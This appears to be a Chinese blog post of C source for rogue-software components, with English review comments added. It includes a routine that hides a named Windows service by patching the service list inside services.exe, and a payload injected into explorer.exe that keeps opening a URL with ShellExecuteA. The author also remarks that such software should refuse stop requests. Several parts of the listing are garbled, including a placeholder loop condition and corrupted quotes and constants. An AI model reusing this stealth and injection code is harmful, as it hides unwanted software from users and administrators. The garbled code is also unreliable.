/**************************************************************************************************
* 记录日志函数
**************************************************************************************************/
#ifdef DEBUG
/*
 * DEBUG-only helper: appends one wide string plus a newline to the file named
 * by DEBUG_LOG (defined elsewhere; not on this page).
 * The fopen() result is used without a NULL check, so an unwritable log path
 * would crash the caller.
 * NOTE(review): the curly quote characters in this listing (“a”, L”…”) are
 * web-rendering artifacts; as printed, the code does not compile.
 */
void LogToFile( WCHAR *str )
{
FILE *fp;
fp = fopen( DEBUG_LOG, “a” ); // append mode; fp is not checked for NULL
fwprintf( fp, L”%s\n”, str ); // on MSVC, %s in fwprintf takes a wide string (standard C would use %ls)
fclose( fp );
}
#endif
这个是隐藏服务用的,修改了services.exe文件,可能有一定的危险性。
代码:
// yunshu(pst) Copy from zzzevazzz(pst)’s code
// A few undocumented structures: the SCM's internal service database inside
// services.exe, as reverse-engineered by the original author. The layout is
// version-specific and is not verified anywhere on this page.
// Defender's summary of this listing: the code opens services.exe with
// SeDebugPrivilege, finds the head of the SCM's in-memory service record list
// by scanning the services.exe image for a code signature, and unlinks the
// record of the named service from that doubly-linked list. Nothing here
// touches the registry, so the service's configuration key presumably stays
// in place; comparing SCM enumeration against the Services registry key, and
// watching for OpenProcess(PROCESS_ALL_ACCESS)/WriteProcessMemory against
// services.exe, are the natural cross-checks.
typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;
typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;
typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;typedef struct _SC_SERVICE_PROCESS
{
PSC_SERVICE_PROCESS Previous;
PSC_SERVICE_PROCESS Next;
WCHAR *ImagePath;
DWORD Pid;
DWORD NumberOfServices;
// …
} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;typedef struct _SC_DEPEND_SERVICE
{
PSC_DEPEND_SERVICE Next;
DWORD Unknow;
PSC_SERVICE_RECORD Service;
// …
} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;typedef struct _SC_SERVICE_RECORD
{
PSC_SERVICE_RECORD Previous; // offset 0: written by HideService() when unlinking
PSC_SERVICE_RECORD Next;     // offset 4: written by HideService() when unlinking
WCHAR *ServiceName;
WCHAR *DisplayName;
DWORD Index;
DWORD Unknow0;
DWORD sErv; // tag field; FindFirstServiceRecord() expects the multi-char constant ‘vrEs’ here
DWORD ControlCount;
DWORD Unknow1;
PSC_SERVICE_PROCESS Process;
SERVICE_STATUS Status;
DWORD StartType;
DWORD ErrorControl;
DWORD TagId;
PSC_DEPEND_SERVICE DependOn;
PSC_DEPEND_SERVICE Depended;
// …
} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;BOOL SetDebugPrivilege()
// Enables SeDebugPrivilege on the current process token.
// Returns the result of AdjustTokenPrivileges(), which reports TRUE even when
// the privilege was not actually assigned (ERROR_NOT_ALL_ASSIGNED), so a TRUE
// here does not prove the privilege is held. A process enabling SeDebugPrivilege
// and then opening services.exe is a strong behavioural indicator for this tool.
{
BOOL bRet = FALSE;
HANDLE hToken = NULL;
LUID luid;
TOKEN_PRIVILEGES tp;if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
}if (hToken) CloseHandle(hToken);
return bRet;
}DWORD GetProcessIdByName(WCHAR *Name)
// Returns the PID of the first process whose image name matches Name
// (case-insensitive, Toolhelp snapshot), or (DWORD)-1 if none is found or the
// snapshot cannot be taken. bRet is declared but never used.
{
BOOL bRet = FALSE;
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
DWORD Pid = -1;hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcessSnap) return -1;pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
do
{
if ( !_wcsicmp(pe32.szExeFile, Name ) )
{
Pid = pe32.th32ProcessID;
break;
}
}
while (Process32Next(hProcessSnap, &pe32));
}CloseHandle(hProcessSnap);
return Pid;
}// Write one DWORD at Addr inside hProcess, temporarily making the containing
// region PAGE_READWRITE and then restoring the previous protection.
// None of the three API results is checked, so a failed write is silent.
void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)
{
MEMORY_BASIC_INFORMATION mbi;
DWORD dwOldProtect, dwWritten;VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect); // old protection lands in mbi.Protect
WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
}// Locate the SCM's service record list.
// Maps %SystemRoot%\System32\Services.exe read-only from disk, scans it for the
// code signature of ScGetServiceDatabase, takes the 4-byte absolute address
// embedded in that instruction, and reads through it in the live process to get
// the first SC_SERVICE_RECORD. Using a file-embedded absolute address as a live
// address only works when the image is loaded at its preferred base (no
// relocation) — presumably the XP-era assumption this was written under.
// Returns the record's address in hProcess, or NULL if anything fails; note
// that hFile/hFileMap are not closed on the two middle early-return paths.
PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)
{
WCHAR FileName[MAX_PATH+1];
HANDLE hFile, hFileMap;
UCHAR * pMap;
DWORD dwSize, dwSizeHigh, i, dwRead;
SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;GetSystemDirectory( FileName, MAX_PATH );
wcscat( FileName, L”\Services.exe”);hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ, // NOTE(review): single backslash is a rendering artifact; unbounded wcscat
NULL, OPEN_EXISTING, 0, NULL);
if (INVALID_HANDLE_VALUE == hFile) return NULL;dwSizeHigh = 0;
dwSize = GetFileSize(hFile, &dwSizeHigh);hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
if (NULL == hFileMap) return NULL;pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);
if (NULL == pMap) return NULL;dwSize -= 12; // the pattern below reads 12 bytes at pMap+i
for (i=0; i<dwSize; ++i)
{
// Look for the byte signature of services!ScGetServiceDatabase:
// three NOPs, a mov eax,[abs32] (A1), then ret (C3) and three NOPs.
// NOTE(review): the × in the second constant is a rendering artifact.
if (*(DWORD*)(pMap+i) == 0xa1909090 &&
*(DWORD*)(pMap+i+8) == 0×909090c3)
{
#ifdef DEBUG
WCHAR tmpBuffer[256] = { 0 };
wsprintf( tmpBuffer, L”map is 0x%08x\n”, (DWORD *)(pMap+i) );
LogToFile( tmpBuffer );
#endifif (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) && // pointer to the list head, read from the live process
ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
SvcRd.sErv == ‘vrEs’) // 'Serv' tag (little-endian) that marks an SC_SERVICE_RECORD
{
pRet = pSvcRd;#ifdef DEBUG
WCHAR tmpBuffer[256] = { 0 };
wsprintf( tmpBuffer, L”pRet is 0x%08x\n”, (DWORD *)(pSvcRd) );
LogToFile( tmpBuffer );
#endifbreak;
}
}
}UnmapViewOfFile(pMap);
CloseHandle(hFileMap);
CloseHandle(hFile);//printf( “addr: 0x%08x\n”, (DWORD *)pRet );
return pRet;
}// Hide a service by name.
// Walks the SCM's in-memory record list in services.exe and, on a
// case-insensitive name match, rewrites Previous->Next and Next->Previous so
// the record is no longer reachable by enumeration. Only the in-memory list is
// changed. Returns TRUE on a successful unlink, FALSE if services.exe cannot be
// found/opened, the list head cannot be located, a read fails, or no record
// matches. Previous/Next are not checked for NULL before the writes, so a match
// at either end of the list writes to a near-zero address in services.exe; a
// services.exe crash (and the forced reboot that follows) is therefore itself an
// observable symptom of this technique.
BOOL HideService( WCHAR *Name )
{
DWORD Pid;
HANDLE hProcess;
SC_SERVICE_RECORD SvcRd, *pSvcRd;
DWORD dwRead, dwNameSize;
WCHAR SvcName[MAX_PATH] = { 0 };dwNameSize = ( wcslen(Name) + 1 ) * sizeof(WCHAR); // bytes to read for the name, including the terminator
if (dwNameSize > sizeof(SvcName)) return FALSE;
Pid = GetProcessIdByName( TEXT(”Services.exe”) );
#ifdef DEBUG
WCHAR tmpBuffer1[256] = { 0 };
wsprintf( tmpBuffer1, L”Pid is %d\n”, Pid );
LogToFile( tmpBuffer1 );
#endifif (Pid == -1) return FALSE;
if( ! SetDebugPrivilege() ) return FALSE;
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid); // full access to services.exe: an audit-worthy event
if (NULL == hProcess) return FALSE;pSvcRd = FindFirstServiceRecord(hProcess);
if (NULL == pSvcRd)
{
#ifdef DEBUG
LogToFile( L”Can’t Find ServiceDatabase.\n” );
#endifCloseHandle(hProcess);
return FALSE;
}do
{
if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead)) // reads only dwNameSize bytes; SvcName keeps the zero-initialised tail
{
// Compare the service name (case-insensitive).
if ( 0 == _wcsicmp(SvcName, Name) )
{
// Unlink from the list (the author notes the record is normally writable
// but changes the page protection anyway, "just in case").
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next); // Previous->Next (offset 4) = Next
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);   // Next->Previous (offset 0) = Previous
#ifdef DEBUG
WCHAR tmpBuffer2[256] = { 0 };
wsprintf( tmpBuffer2, L”The Service \”%s\” Is Hidden Successfully.\n”, Name );
LogToFile( tmpBuffer1 ); // as written this logs tmpBuffer1 (the PID line), not tmpBuffer2
#endifCloseHandle(hProcess);
return TRUE;
}
}
else
{
break;
}
}
while (pSvcRd = SvcSvcRdNextPlaceholder);if( NULL != hProcess )
{
CloseHandle(hProcess);
}return FALSE;
}
这个是注入到explorer.exe进程中的代码,大部分参数是写内存写进去的,有少部分实在懒得搞了,用了一点汇编。
代码:
// Argument block for the injected routine below. The prose on this page says it
// is written into explorer.exe by a separate injector (not shown), which
// presumably fills in the strings and the two function pointers; nothing here
// validates any of them.
typedef struct _Arguments
{
char MyUrl[512];      // offset 0x000: passed as lpParameters to ShellExecuteA
char MyProgram[512];  // offset 0x200: passed as lpFile to ShellExecuteA
FARPROC MyLoadLibrary;
FARPROC MyGetAddress;
char MyKernelDll[32];
char MyShellDll[32];
char MyZeroMemory[32];
char MyShellExecute[32];
DWORD SleepTime;
}Arguments;/**************************************************************************************************
* WINAPI function prototypes (resolved through the pointers in Arguments, not via the import table)
**************************************************************************************************/
typedef HMODULE (__stdcall *LOADLIBRARYA)( IN char* lpFileName );
typedef FARPROC (__stdcall *GETPROCADDRESS)( IN HMODULE hModule, IN char* lpProcName );
typedef void (__stdcall *ZEROMEMORY)( IN PVOID Destination, IN SIZE_T Length );void __stdcall CustomFunction( LPVOID my_arguments )
// Thread routine run inside the injected process (explorer.exe per the page).
// It resolves everything it needs from the Arguments block, then loops forever:
// ShellExecuteA(NULL, "open", MyProgram, MyUrl, NULL, SW_SHOWMAXIMIZED) followed
// by Sleep(SleepTime). Never returns.
// Detection angle: explorer.exe repeatedly spawning the same program with a URL
// argument on a fixed interval, from a thread whose start address is not backed
// by any loaded module.
// NOTE(review): the curly quotes and the empty ” operands in the asm are
// rendering artifacts; as printed this does not assemble.
{
Arguments *func_args = (Arguments *)my_arguments;LOADLIBRARYA LoadLibraryA = (LOADLIBRARYA)func_args->MyLoadLibrary;
GETPROCADDRESS GetProcAddress = (GETPROCADDRESS)func_args->MyGetAddress;HMODULE h_kernel = LoadLibraryA( func_args->MyKernelDll );
HMODULE h_shell = LoadLibraryA( func_args->MyShellDll );ZEROMEMORY ZeroMemory = (ZEROMEMORY)GetProcAddress( h_kernel, func_args->MyZeroMemory ); // resolved but not used in this listing
DWORD MyShellExecuteA = (DWORD)GetProcAddress( h_shell, func_args->MyShellExecute );
DWORD MySleep;
DWORD sleep_time = func_args->SleepTime;__asm
// Builds the 6-byte string "Sleep\0" on the stack and resolves it from h_kernel,
// storing the result in MySleep (the name never appears as a literal).
{
push eax
push espsub esp, 6
mov byte ptr [esp], ‘S’
mov byte ptr [esp+1], ‘l’
mov byte ptr [esp+2], ‘e’
mov byte ptr [esp+3], ‘e’
mov byte ptr [esp+4], ‘p’
mov byte ptr [esp+5], ”
lea eax, [esp]push eax
push h_kernel
call GetProcAddress
mov MySleep, eaxadd esp, 6
pop esp
pop eax
}while( 1 )
{
__asm
// Builds "open\0" on the stack, then pushes the six ShellExecuteA arguments
// right-to-left: SW_SHOWMAXIMIZED, NULL dir, MyUrl (func_args + 0), MyProgram
// (func_args + 0x200), "open", NULL hwnd. Then Sleep(sleep_time).
{
push eax
push esp
push ecx
push ebxsub esp, 256
mov byte ptr [esp], ‘o’
mov byte ptr [esp+1], ‘p’
mov byte ptr [esp+2], ‘e’
mov byte ptr [esp+3], ‘n’
mov byte ptr [esp+4], ”
lea ebx, [esp]push SW_SHOWMAXIMIZED
push 0
push func_argsmov ecx, func_args
add ecx, 200h
lea eax, [ecx]
push eaxpush ebx
push 0call MyShellExecuteA
add esp, 256
pop ebx
pop ecx
pop esp
pop eaxpush sleep_time
call MySleep
}
}
}
这个是控制服务的,正常的服务程序都有的代码,流氓软件应该不接受停止服务请求。